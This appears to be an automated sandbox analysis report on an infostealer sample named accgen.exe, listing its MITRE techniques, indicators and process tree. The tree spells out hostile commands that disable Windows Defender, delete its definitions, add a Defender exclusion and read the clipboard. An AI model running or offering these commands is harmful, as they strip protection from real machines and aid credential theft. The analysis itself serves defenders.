2b48a65306f5b0c5cc4d23e902277c067f3a288892771bc7dffd225882214295

Resubmissions

04-12-2024 04:21

241204-eymbza1qgy 10

04-12-2024 04:20

241204-eya9ps1qfw 10

Analysis

max time kernel
142s
max time network
150s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
04-12-2024 04:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

accgen.exe
Size

7.5MB
MD5

a67d509f43e7644fc0e19982afb5e78b
SHA1

e7793b425aaf522ae16e46d1b1208ff47b795e6c
SHA256

2b48a65306f5b0c5cc4d23e902277c067f3a288892771bc7dffd225882214295
SHA512

2aac62fafb430156b17f69bcca4b3e6f16a05eb42ed895e2ce10e0cd14e114cffb92c6328660460f01c132acc168e345db91a5ecf3856f8b98ca29b08ff7ee22
SSDEEP

196608:afQCwVUurErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC1n:nVUurEUWjqeWx06rYYn

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
1588	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1032	powershell.exe
2252	powershell.exe
1648	powershell.exe
2576	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	accgen.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2276	cmd.exe
2860	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2328	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe
4784	accgen.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
78	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3036	tasklist.exe
2152	tasklist.exe
4352	tasklist.exe
3036	tasklist.exe
60	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000045061-21.dat	upx
behavioral1/memory/4784-25-0x00007FFEE49B0000-0x00007FFEE5074000-memory.dmp	upx
behavioral1/files/0x0028000000045054-27.dat	upx
behavioral1/files/0x002800000004505f-31.dat	upx
behavioral1/memory/4784-48-0x00007FFEFB3E0000-0x00007FFEFB3EF000-memory.dmp	upx
behavioral1/memory/4784-30-0x00007FFEF40D0000-0x00007FFEF40F5000-memory.dmp	upx
behavioral1/files/0x002800000004505b-47.dat	upx
behavioral1/files/0x002800000004505a-46.dat	upx
behavioral1/files/0x0028000000045059-45.dat	upx
behavioral1/files/0x0028000000045058-44.dat	upx
behavioral1/files/0x0028000000045057-43.dat	upx
behavioral1/files/0x0028000000045056-42.dat	upx
behavioral1/files/0x0028000000045055-41.dat	upx
behavioral1/files/0x0028000000045053-40.dat	upx
behavioral1/files/0x0028000000045066-39.dat	upx
behavioral1/files/0x0028000000045065-38.dat	upx
behavioral1/files/0x0028000000045064-37.dat	upx
behavioral1/files/0x0028000000045060-34.dat	upx
behavioral1/files/0x002800000004505e-33.dat	upx
behavioral1/memory/4784-54-0x00007FFEF3C30000-0x00007FFEF3C5D000-memory.dmp	upx
behavioral1/memory/4784-58-0x00007FFEF3A20000-0x00007FFEF3A44000-memory.dmp	upx
behavioral1/memory/4784-57-0x00007FFEF3F20000-0x00007FFEF3F3A000-memory.dmp	upx
behavioral1/memory/4784-60-0x00007FFEE4830000-0x00007FFEE49AF000-memory.dmp	upx
behavioral1/memory/4784-64-0x00007FFEF4370000-0x00007FFEF437D000-memory.dmp	upx
behavioral1/memory/4784-63-0x00007FFEF3E50000-0x00007FFEF3E69000-memory.dmp	upx
behavioral1/memory/4784-66-0x00007FFEF39E0000-0x00007FFEF3A13000-memory.dmp	upx
behavioral1/memory/4784-71-0x00007FFEF3630000-0x00007FFEF36FD000-memory.dmp	upx
behavioral1/memory/4784-70-0x00007FFEE49B0000-0x00007FFEE5074000-memory.dmp	upx
behavioral1/memory/4784-74-0x00007FFEF40D0000-0x00007FFEF40F5000-memory.dmp	upx
behavioral1/memory/4784-78-0x00007FFEF4250000-0x00007FFEF425D000-memory.dmp	upx
behavioral1/memory/4784-81-0x00007FFEE3AD0000-0x00007FFEE3BEB000-memory.dmp	upx
behavioral1/memory/4784-80-0x00007FFEF3A20000-0x00007FFEF3A44000-memory.dmp	upx
behavioral1/memory/4784-77-0x00007FFEEAD80000-0x00007FFEEAD94000-memory.dmp	upx
behavioral1/memory/4784-73-0x00007FFEE4300000-0x00007FFEE4829000-memory.dmp	upx
behavioral1/memory/4784-95-0x00007FFEE4830000-0x00007FFEE49AF000-memory.dmp	upx
behavioral1/memory/4784-113-0x00007FFEF39E0000-0x00007FFEF3A13000-memory.dmp	upx
behavioral1/memory/4784-192-0x00007FFEF3630000-0x00007FFEF36FD000-memory.dmp	upx
behavioral1/memory/4784-214-0x00007FFEE4300000-0x00007FFEE4829000-memory.dmp	upx
behavioral1/memory/4784-318-0x00007FFEE3AD0000-0x00007FFEE3BEB000-memory.dmp	upx
behavioral1/memory/4784-313-0x00007FFEF3630000-0x00007FFEF36FD000-memory.dmp	upx
behavioral1/memory/4784-312-0x00007FFEF39E0000-0x00007FFEF3A13000-memory.dmp	upx
behavioral1/memory/4784-303-0x00007FFEE49B0000-0x00007FFEE5074000-memory.dmp	upx
behavioral1/memory/4784-309-0x00007FFEE4830000-0x00007FFEE49AF000-memory.dmp	upx
behavioral1/memory/4784-304-0x00007FFEF40D0000-0x00007FFEF40F5000-memory.dmp	upx
behavioral1/memory/4784-655-0x00007FFEE49B0000-0x00007FFEE5074000-memory.dmp	upx
behavioral1/memory/4784-701-0x00007FFEF3630000-0x00007FFEF36FD000-memory.dmp	upx
behavioral1/memory/4784-700-0x00007FFEF39E0000-0x00007FFEF3A13000-memory.dmp	upx
behavioral1/memory/4784-699-0x00007FFEF4370000-0x00007FFEF437D000-memory.dmp	upx
behavioral1/memory/4784-698-0x00007FFEF3E50000-0x00007FFEF3E69000-memory.dmp	upx
behavioral1/memory/4784-697-0x00007FFEE4830000-0x00007FFEE49AF000-memory.dmp	upx
behavioral1/memory/4784-696-0x00007FFEF3A20000-0x00007FFEF3A44000-memory.dmp	upx
behavioral1/memory/4784-695-0x00007FFEF3F20000-0x00007FFEF3F3A000-memory.dmp	upx
behavioral1/memory/4784-694-0x00007FFEF3C30000-0x00007FFEF3C5D000-memory.dmp	upx
behavioral1/memory/4784-693-0x00007FFEFB3E0000-0x00007FFEFB3EF000-memory.dmp	upx
behavioral1/memory/4784-692-0x00007FFEF40D0000-0x00007FFEF40F5000-memory.dmp	upx
behavioral1/memory/4784-676-0x00007FFEE49B0000-0x00007FFEE5074000-memory.dmp	upx
behavioral1/memory/4784-691-0x00007FFEE4300000-0x00007FFEE4829000-memory.dmp	upx
behavioral1/memory/4784-690-0x00007FFEE3AD0000-0x00007FFEE3BEB000-memory.dmp	upx
behavioral1/memory/4784-689-0x00007FFEF4250000-0x00007FFEF425D000-memory.dmp	upx
behavioral1/memory/4784-688-0x00007FFEEAD80000-0x00007FFEEAD94000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1756	cmd.exe
1508	netsh.exe

Checks processor information in registry 2 TTPs 20 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2620	WMIC.exe
1132	WMIC.exe
6068	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2404	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
1032	powershell.exe
1032	powershell.exe
4704	WMIC.exe
4704	WMIC.exe
4704	WMIC.exe
4704	WMIC.exe
2252	powershell.exe
2252	powershell.exe
2620	WMIC.exe
2620	WMIC.exe
2620	WMIC.exe
2620	WMIC.exe
1132	WMIC.exe
1132	WMIC.exe
1132	WMIC.exe
1132	WMIC.exe
1060	WMIC.exe
1060	WMIC.exe
1060	WMIC.exe
1060	WMIC.exe
2860	powershell.exe
2860	powershell.exe
2860	powershell.exe
3376	powershell.exe
3376	powershell.exe
3376	powershell.exe
1648	powershell.exe
1648	powershell.exe
704	powershell.exe
704	powershell.exe
4896	WMIC.exe
4896	WMIC.exe
4896	WMIC.exe
4896	WMIC.exe
2724	WMIC.exe
2724	WMIC.exe
2724	WMIC.exe
2724	WMIC.exe
3684	WMIC.exe
3684	WMIC.exe
3684	WMIC.exe
3684	WMIC.exe
2576	powershell.exe
2576	powershell.exe
2576	powershell.exe
6068	WMIC.exe
6068	WMIC.exe
6068	WMIC.exe
6068	WMIC.exe
1100	powershell.exe
1100	powershell.exe
1100	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeIncreaseQuotaPrivilege	4704	WMIC.exe
Token: SeSecurityPrivilege	4704	WMIC.exe
Token: SeTakeOwnershipPrivilege	4704	WMIC.exe
Token: SeLoadDriverPrivilege	4704	WMIC.exe
Token: SeSystemProfilePrivilege	4704	WMIC.exe
Token: SeSystemtimePrivilege	4704	WMIC.exe
Token: SeProfSingleProcessPrivilege	4704	WMIC.exe
Token: SeIncBasePriorityPrivilege	4704	WMIC.exe
Token: SeCreatePagefilePrivilege	4704	WMIC.exe
Token: SeBackupPrivilege	4704	WMIC.exe
Token: SeRestorePrivilege	4704	WMIC.exe
Token: SeShutdownPrivilege	4704	WMIC.exe
Token: SeDebugPrivilege	4704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4704	WMIC.exe
Token: SeRemoteShutdownPrivilege	4704	WMIC.exe
Token: SeUndockPrivilege	4704	WMIC.exe
Token: SeManageVolumePrivilege	4704	WMIC.exe
Token: 33	4704	WMIC.exe
Token: 34	4704	WMIC.exe
Token: 35	4704	WMIC.exe
Token: 36	4704	WMIC.exe
Token: SeDebugPrivilege	3036	tasklist.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeIncreaseQuotaPrivilege	4704	WMIC.exe
Token: SeSecurityPrivilege	4704	WMIC.exe
Token: SeTakeOwnershipPrivilege	4704	WMIC.exe
Token: SeLoadDriverPrivilege	4704	WMIC.exe
Token: SeSystemProfilePrivilege	4704	WMIC.exe
Token: SeSystemtimePrivilege	4704	WMIC.exe
Token: SeProfSingleProcessPrivilege	4704	WMIC.exe
Token: SeIncBasePriorityPrivilege	4704	WMIC.exe
Token: SeCreatePagefilePrivilege	4704	WMIC.exe
Token: SeBackupPrivilege	4704	WMIC.exe
Token: SeRestorePrivilege	4704	WMIC.exe
Token: SeShutdownPrivilege	4704	WMIC.exe
Token: SeDebugPrivilege	4704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4704	WMIC.exe
Token: SeRemoteShutdownPrivilege	4704	WMIC.exe
Token: SeUndockPrivilege	4704	WMIC.exe
Token: SeManageVolumePrivilege	4704	WMIC.exe
Token: 33	4704	WMIC.exe
Token: 34	4704	WMIC.exe
Token: 35	4704	WMIC.exe
Token: 36	4704	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1032	powershell.exe
Token: SeSecurityPrivilege	1032	powershell.exe
Token: SeTakeOwnershipPrivilege	1032	powershell.exe
Token: SeLoadDriverPrivilege	1032	powershell.exe
Token: SeSystemProfilePrivilege	1032	powershell.exe
Token: SeSystemtimePrivilege	1032	powershell.exe
Token: SeProfSingleProcessPrivilege	1032	powershell.exe
Token: SeIncBasePriorityPrivilege	1032	powershell.exe
Token: SeCreatePagefilePrivilege	1032	powershell.exe
Token: SeBackupPrivilege	1032	powershell.exe
Token: SeRestorePrivilege	1032	powershell.exe
Token: SeShutdownPrivilege	1032	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeSystemEnvironmentPrivilege	1032	powershell.exe
Token: SeRemoteShutdownPrivilege	1032	powershell.exe
Token: SeUndockPrivilege	1032	powershell.exe
Token: SeManageVolumePrivilege	1032	powershell.exe
Token: 33	1032	powershell.exe
Token: 34	1032	powershell.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe
5636	firefox.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
2100	firefox.exe
5636	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4196 wrote to memory of 4784	4196	accgen.exe	83
PID 4196 wrote to memory of 4784	4196	accgen.exe	83
PID 4784 wrote to memory of 4632	4784	accgen.exe	84
PID 4784 wrote to memory of 4632	4784	accgen.exe	84
PID 4784 wrote to memory of 3244	4784	accgen.exe	85
PID 4784 wrote to memory of 3244	4784	accgen.exe	85
PID 4784 wrote to memory of 1604	4784	accgen.exe	86
PID 4784 wrote to memory of 1604	4784	accgen.exe	86
PID 4784 wrote to memory of 1204	4784	accgen.exe	90
PID 4784 wrote to memory of 1204	4784	accgen.exe	90
PID 4784 wrote to memory of 1860	4784	accgen.exe	92
PID 4784 wrote to memory of 1860	4784	accgen.exe	92
PID 4632 wrote to memory of 1032	4632	cmd.exe	94
PID 4632 wrote to memory of 1032	4632	cmd.exe	94
PID 1204 wrote to memory of 3036	1204	cmd.exe	95
PID 1204 wrote to memory of 3036	1204	cmd.exe	95
PID 1860 wrote to memory of 4704	1860	cmd.exe	96
PID 1860 wrote to memory of 4704	1860	cmd.exe	96
PID 3244 wrote to memory of 2252	3244	cmd.exe	97
PID 3244 wrote to memory of 2252	3244	cmd.exe	97
PID 1604 wrote to memory of 2900	1604	cmd.exe	98
PID 1604 wrote to memory of 2900	1604	cmd.exe	98
PID 4784 wrote to memory of 1912	4784	accgen.exe	101
PID 4784 wrote to memory of 1912	4784	accgen.exe	101
PID 1912 wrote to memory of 3684	1912	cmd.exe	103
PID 1912 wrote to memory of 3684	1912	cmd.exe	103
PID 4784 wrote to memory of 4520	4784	accgen.exe	104
PID 4784 wrote to memory of 4520	4784	accgen.exe	104
PID 4520 wrote to memory of 3216	4520	cmd.exe	106
PID 4520 wrote to memory of 3216	4520	cmd.exe	106
PID 4784 wrote to memory of 1028	4784	accgen.exe	107
PID 4784 wrote to memory of 1028	4784	accgen.exe	107
PID 1028 wrote to memory of 2620	1028	cmd.exe	109
PID 1028 wrote to memory of 2620	1028	cmd.exe	109
PID 3244 wrote to memory of 1588	3244	cmd.exe	110
PID 3244 wrote to memory of 1588	3244	cmd.exe	110
PID 4784 wrote to memory of 2752	4784	accgen.exe	111
PID 4784 wrote to memory of 2752	4784	accgen.exe	111
PID 2752 wrote to memory of 1132	2752	cmd.exe	113
PID 2752 wrote to memory of 1132	2752	cmd.exe	113
PID 4784 wrote to memory of 2816	4784	accgen.exe	117
PID 4784 wrote to memory of 2816	4784	accgen.exe	117
PID 4784 wrote to memory of 2224	4784	accgen.exe	116
PID 4784 wrote to memory of 2224	4784	accgen.exe	116
PID 4784 wrote to memory of 1200	4784	accgen.exe	120
PID 4784 wrote to memory of 1200	4784	accgen.exe	120
PID 4784 wrote to memory of 2276	4784	accgen.exe	202
PID 4784 wrote to memory of 2276	4784	accgen.exe	202
PID 4784 wrote to memory of 2468	4784	accgen.exe	124
PID 4784 wrote to memory of 2468	4784	accgen.exe	124
PID 2224 wrote to memory of 2152	2224	cmd.exe	125
PID 2224 wrote to memory of 2152	2224	cmd.exe	125
PID 2816 wrote to memory of 4352	2816	cmd.exe	127
PID 2816 wrote to memory of 4352	2816	cmd.exe	127
PID 4784 wrote to memory of 2036	4784	accgen.exe	128
PID 4784 wrote to memory of 2036	4784	accgen.exe	128
PID 4784 wrote to memory of 1756	4784	accgen.exe	130
PID 4784 wrote to memory of 1756	4784	accgen.exe	130
PID 4784 wrote to memory of 4508	4784	accgen.exe	132
PID 4784 wrote to memory of 4508	4784	accgen.exe	132
PID 4784 wrote to memory of 4852	4784	accgen.exe	133
PID 4784 wrote to memory of 4852	4784	accgen.exe	133
PID 4784 wrote to memory of 1992	4784	accgen.exe	134
PID 4784 wrote to memory of 1992	4784	accgen.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1816	attrib.exe
3488	attrib.exe

C:\Users\Admin\AppData\Local\Temp\accgen.exe
"C:\Users\Admin\AppData\Local\Temp\accgen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4196
- C:\Users\Admin\AppData\Local\Temp\accgen.exe
  "C:\Users\Admin\AppData\Local\Temp\accgen.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\accgen.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\accgen.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2252
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:1588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Try reinstalling', 0, 'Random error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1604
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Try reinstalling', 0, 'Random error', 0+16);close()"
      4⤵
      PID:2900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1204
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2224
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1200
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2468
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2036
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3844
